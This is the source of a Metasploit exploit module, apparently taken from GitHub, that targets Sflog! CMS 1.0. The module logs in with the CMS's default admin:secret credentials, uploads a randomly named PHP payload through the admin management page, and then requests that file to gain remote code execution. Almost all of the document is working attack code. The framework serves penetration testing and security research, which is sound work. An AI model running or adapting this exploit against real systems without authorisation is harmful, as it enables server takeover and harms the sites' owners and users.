-
Notifications
You must be signed in to change notification settings - Fork 13.9k
/
sflog_upload_exec.rb
155 lines (132 loc) · 4.58 KB
/
sflog_upload_exec.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info={})
super(update_info(info,
'Name' => "Sflog! CMS 1.0 Arbitrary File Upload Vulnerability",
'Description' => %q{
This module exploits multiple design flaws in Sflog 1.0. By default, the CMS has
a default admin credential of "admin:secret", which can be abused to access
administrative features such as blogs management. Through the management
interface, we can upload a backdoor that's accessible by any remote user, and then
gain arbitrary code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'dun', # Discovery, PoC
'sinn3r' # Metasploit
],
'References' =>
[
['OSVDB', '83767'],
['EDB', '19626']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Platform' => %w{ linux php },
'Targets' =>
[
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
],
'Privileged' => false,
'DisclosureDate' => '2012-07-06',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base directory to sflog!', '/sflog/']),
OptString.new('USERNAME', [true, 'The username to login with', 'admin']),
OptString.new('PASSWORD', [true, 'The password to login with', 'secret'])
])
end
def check
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
res = send_request_raw({'uri'=>"#{base}/index.php"})
if not res
return Exploit::CheckCode::Unknown
elsif res and res.body =~ /\<input type\=\"hidden\" name\=\"sitesearch\" value\=\"www\.thebonnotgang\.com\/sflog/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
#
# login unfortunately is needed, because we need to make sure blogID is set, and the upload
# script (uploadContent.inc.php) doesn't actually do that, even though we can access it
# directly.
#
def do_login(base)
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}/admin/login.php",
'vars_post' => {
'userID' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
})
if res and res.get_cookies.include?('PHPSESSID') and res.body !~ /\<i\>Access denied\!\<\/i\>/
return res.get_cookies
else
return ''
end
end
#
# Upload our payload, and then execute it.
#
def upload_exec(cookie, base, php_fname, p)
data = Rex::MIME::Message.new
data.add_part('download', nil, nil, "form-data; name=\"blogID\"")
data.add_part('7', nil, nil, "form-data; name=\"contentType\"")
data.add_part('3000', nil, nil, "form-data; name=\"MAX_FILE_SIZE\"")
data.add_part(p, 'text/plain', nil, "form-data; name=\"fileID\"; filename=\"#{php_fname}\"")
post_data = data.to_s
print_status("Uploading payload (#{p.length.to_s} bytes)...")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}/admin/manage.php",
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie,
'headers' => {
'Referer' => "http://#{rhost}#{base}/admin/manage.php",
'Origin' => "http://#{rhost}"
}
})
if not res
print_error("No response from host")
return
end
target_path = "#{base}/blogs/download/uploads/#{php_fname}"
print_status("Requesting '#{target_path}'...")
res = send_request_raw({'uri'=>target_path})
if res and res.code == 404
print_error("Upload unsuccessful: #{res.code.to_s}")
return
end
handler
end
def exploit
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
print_status("Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
cookie = do_login(base)
if cookie.empty?
print_error("Unable to login")
return
end
php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"
p = get_write_exec_payload(:unlink_self=>true)
upload_exec(cookie, base, php_fname, p)
end
end